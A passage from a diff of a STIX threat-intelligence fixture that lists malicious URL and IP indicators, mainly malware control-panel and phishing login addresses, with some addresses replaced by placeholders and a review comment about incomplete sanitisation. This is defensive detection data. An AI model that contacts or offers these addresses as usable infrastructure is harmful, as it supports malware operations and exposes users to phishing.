 {"created":"2020-01-22T03:01:57.189Z","description":"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime","id":"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T03:01:57.189Z","name":"mal_url: http://35.158.92.3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://35.158.92.3/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:01:57.189Z"}
-{"created":"2020-01-22T03:01:57.279Z","description":"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-42"],"modified":"2020-01-22T03:01:57.279Z","name":"mal_ip: 45.95.168.70","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.95.168.70']","type":"indicator","valid_from":"2020-01-22T03:01:57.279Z"}
+{"created":"2020-01-22T03:01:57.279Z","description":"TS ID: 55241332101; iType: mal_ip; State: active; Source: 
CyberCrime","id":"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-42"],"modified":"2020-01-22T03:01:57.279Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-22T03:01:57.279Z"}
 {"created":"2020-01-22T03:02:50.57Z","description":"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--23215acb-4989-4434-ac6d-8f9367734f0f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:02:50.57Z","name":"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:02:50.57Z"}
 {"created":"2020-01-22T03:02:52.496Z","description":"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-26"],"modified":"2020-01-22T03:02:52.496Z","name":"mal_url: http://f0391600.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391600.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:02:52.496Z"}
 {"created":"2020-01-22T03:03:42.819Z","description":"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--10958d74-ec60-41af-a1ab-1613257e670f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-22T03:03:42.819Z","name":"mal_url: 
http://extraclick.space/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://extraclick.space/login.php']","type":"indicator","valid_from":"2020-01-22T03:03:42.819Z"} 
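Review bot: The unchanged context record for TS ID 55241332377 still embeds a public address in its URL, `http://35.158.92.3/panel/admin.php`, although the `@@ -1,18` hunk replaced the same kind of URL-embedded IPs (`http://178.62.187.103/login`, `http://95.182.122.184/`) with 89.160.20.156; if the sanitisation is meant to be complete, this one was missed. Changing it to `"name":"mal_url: http://89.160.20.156/panel/admin.php"` together with the matching `"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']"` keeps the fixture consistent, assuming no test depends on that host being distinct. The three mal_ip records changed in this hunk now all carry 89.160.20.156, so the hunk no longer exercises more than one enriched address.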
@@ -39,38 +39,38 @@ {"created":"2020-01-22T03:04:32.717Z","description":"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime","id":"indicator--43febf7d-4185-4a12-a868-e7be690b14aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-22T03:04:32.717Z","name":"mal_url: http://zanlma.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zanlma.com/login']","type":"indicator","valid_from":"2020-01-22T03:04:32.717Z"} {"created":"2020-01-22T03:04:56.858Z","description":"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-22T03:04:56.858Z","name":"mal_url: http://f0369688.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0369688.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T03:04:56.858Z"} {"created":"2020-01-22T03:04:59.245Z","description":"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:04:59.245Z","name":"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:04:59.245Z"} -{"created":"2020-01-23T03:00:22.287Z","description":"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: 
CyberCrime","id":"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-57"],"modified":"2020-01-23T03:00:22.287Z","name":"mal_ip: 192.185.214.199","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.214.199']","type":"indicator","valid_from":"2020-01-23T03:00:22.287Z"} +{"created":"2020-01-23T03:00:22.287Z","description":"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-57"],"modified":"2020-01-23T03:00:22.287Z","name":"mal_ip: 192.168.214.199","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.214.199']","type":"indicator","valid_from":"2020-01-23T03:00:22.287Z"} {"created":"2020-01-23T03:01:11.329Z","description":"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-23T03:01:11.329Z","name":"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:01:11.329Z"} {"created":"2020-01-23T03:01:36.682Z","description":"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-23T03:01:36.682Z","name":"mal_url: 
http://imobiliariatirol.com/gh/panelnew/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']","type":"indicator","valid_from":"2020-01-23T03:01:36.682Z"} {"created":"2020-01-23T03:02:15.854Z","description":"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--27323b7d-85d3-4e89-8249-b7696925a772","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-23T03:02:15.854Z","name":"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-23T03:02:15.854Z"} {"created":"2020-01-23T03:02:47.364Z","description":"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0639721-de55-48c6-b237-3859d61aecfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-23T03:02:47.364Z","name":"mal_url: http://f0392261.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0392261.xsph.ru/login']","type":"indicator","valid_from":"2020-01-23T03:02:47.364Z"} -{"created":"2020-01-23T03:03:05.048Z","description":"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--677e714d-c237-42a1-b6b7-9145acd13eee","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-23T03:03:05.048Z","name":"mal_url: 
http://104.168.99.168/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.168/panel/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:05.048Z"} +{"created":"2020-01-23T03:03:05.048Z","description":"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--677e714d-c237-42a1-b6b7-9145acd13eee","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-23T03:03:05.048Z","name":"mal_url: http://89.160.20.156/panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:05.048Z"} {"created":"2020-01-23T03:03:15.734Z","description":"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-23T03:03:15.734Z","name":"mal_url: http://f0387404.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:15.734Z"} {"created":"2020-01-23T03:03:42.599Z","description":"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-01-23T03:03:42.599Z","name":"mal_url: 
http://a0386457.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-01-23T03:03:42.599Z"} {"created":"2020-01-24T02:57:04.821Z","description":"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-24T02:57:04.821Z","name":"mal_url: http://defenseisrael.com/dis/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://defenseisrael.com/dis/index.php']","type":"indicator","valid_from":"2020-01-24T02:57:04.821Z"} -{"created":"2020-01-24T02:57:04.857Z","description":"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:04.857Z","name":"mal_ip: 91.215.170.249","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.170.249']","type":"indicator","valid_from":"2020-01-24T02:57:04.857Z"} +{"created":"2020-01-24T02:57:04.857Z","description":"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. 
Ltd.; Source: CyberCrime","id":"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:04.857Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:57:04.857Z"} {"created":"2020-01-24T02:57:04.883Z","description":"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-24T02:57:04.883Z","name":"mal_url: http://lbfb3f03.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:57:04.883Z"} {"created":"2020-01-24T02:57:12.997Z","description":"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:12.997Z","name":"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:12.997Z"} -{"created":"2020-01-24T02:57:13.025Z","description":"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: 
CyberCrime","id":"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-24T02:57:13.025Z","name":"mal_url: http://199.192.28.11/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://199.192.28.11/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:57:13.025Z"} -{"created":"2020-01-24T02:57:32.901Z","description":"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:57:32.901Z","name":"mal_url: http://217.8.117.51/aW8bVds1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.51/aW8bVds1/login.php']","type":"indicator","valid_from":"2020-01-24T02:57:32.901Z"} +{"created":"2020-01-24T02:57:13.025Z","description":"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-24T02:57:13.025Z","name":"mal_url: http://199.192.168.11/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://199.192.168.11/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:57:13.025Z"} +{"created":"2020-01-24T02:57:32.901Z","description":"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:57:32.901Z","name":"mal_url: 
http://89.160.20.156/aW8bVds1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/aW8bVds1/login.php']","type":"indicator","valid_from":"2020-01-24T02:57:32.901Z"} {"created":"2020-01-24T02:57:32.929Z","description":"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-24T02:57:32.929Z","name":"mal_url: http://lansome.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lansome.site/login']","type":"indicator","valid_from":"2020-01-24T02:57:32.929Z"} {"created":"2020-01-24T02:57:49.028Z","description":"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--e88008f4-76fc-428d-831a-4b389e48b712","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T02:57:49.028Z","name":"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:57:49.028Z"} {"created":"2020-01-24T02:58:03.345Z","description":"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-01-24T02:58:03.345Z","name":"mal_url: 
http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:03.345Z"} {"created":"2020-01-24T02:58:16.318Z","description":"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:58:16.318Z","name":"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.318Z"} {"created":"2020-01-24T02:58:16.358Z","description":"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--4adabe80-3be4-401a-948a-f9724c872374","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-24T02:58:16.358Z","name":"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.358Z"} {"created":"2020-01-24T02:58:32.126Z","description":"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:32.126Z","name":"mal_url: 
http://suspiciousactivity.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://suspiciousactivity.xyz/login']","type":"indicator","valid_from":"2020-01-24T02:58:32.126Z"} -{"created":"2020-01-24T02:58:37.603Z","description":"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:37.603Z","name":"mal_url: http://217.8.117.8/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.8/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.603Z"} +{"created":"2020-01-24T02:58:37.603Z","description":"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:37.603Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.603Z"} {"created":"2020-01-24T02:58:37.643Z","description":"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--33e674f5-a64a-48f4-9d8c-248348356135","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-24T02:58:37.643Z","name":"mal_url: http://f0387550.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387550.xsph.ru/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.643Z"} 
{"created":"2020-01-24T02:58:39.465Z","description":"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6311f539-1d5d-423f-a238-d0c1dc167432","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T02:58:39.465Z","name":"mal_url: http://lf4e4abf.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:58:39.465Z"} -{"created":"2020-01-24T02:59:02.031Z","description":"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:59:02.031Z","name":"mal_ip: 206.217.131.245","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '206.217.131.245']","type":"indicator","valid_from":"2020-01-24T02:59:02.031Z"} +{"created":"2020-01-24T02:59:02.031Z","description":"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:59:02.031Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:59:02.031Z"} {"created":"2020-01-24T02:59:15.878Z","description":"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: 
CyberCrime","id":"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-01-24T02:59:15.878Z","name":"mal_url: http://67.215.224.101/a1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.101/a1/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:15.878Z"} -{"created":"2020-01-24T02:59:29.155Z","description":"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T02:59:29.155Z","name":"mal_ip: 162.241.73.163","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.73.163']","type":"indicator","valid_from":"2020-01-24T02:59:29.155Z"} +{"created":"2020-01-24T02:59:29.155Z","description":"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T02:59:29.155Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:59:29.155Z"} {"created":"2020-01-24T02:59:50.233Z","description":"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--d5bdff38-6939-4a47-8e11-b910520565c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:50.233Z","name":"mal_url: 
http://l60bdd58.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:59:50.233Z"} -{"created":"2020-01-24T02:59:50.255Z","description":"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1be74977-5aa6-4175-99dd-32b54863a06b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-25"],"modified":"2020-01-24T02:59:50.255Z","name":"mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:50.255Z"} -{"created":"2020-01-24T02:59:52.536Z","description":"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:52.536Z","name":"mal_url: http://5.188.60.52/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.52/login']","type":"indicator","valid_from":"2020-01-24T02:59:52.536Z"} +{"created":"2020-01-24T02:59:50.255Z","description":"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1be74977-5aa6-4175-99dd-32b54863a06b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-25"],"modified":"2020-01-24T02:59:50.255Z","name":"mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://89.160.20.156/~giftioz/.azma/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:50.255Z"} +{"created":"2020-01-24T02:59:52.536Z","description":"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:52.536Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-24T02:59:52.536Z"} {"created":"2020-01-24T02:59:54.784Z","description":"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--504f4011-eaea-4921-aad5-f102bef7c798","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-24T02:59:54.784Z","name":"mal_url: http://trotdeiman.ga/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 